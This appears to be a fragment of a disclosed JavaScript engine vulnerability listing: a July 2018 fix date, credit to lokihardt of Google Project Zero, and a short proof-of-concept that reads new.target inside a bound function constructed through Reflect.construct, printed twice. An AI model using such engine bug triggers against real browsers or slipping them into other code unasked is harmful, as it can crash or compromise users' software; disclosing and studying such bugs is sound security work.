- Fix: July 2018
- Credit: lokihardt of Google Project Zero
function func() {
new.target.x;
}
let bound = func.bind({}, 1);
Reflect.construct(bound, []);
function func() {
new.target.x;
}
let bound = func.bind({}, 1);
Reflect.construct(bound, []);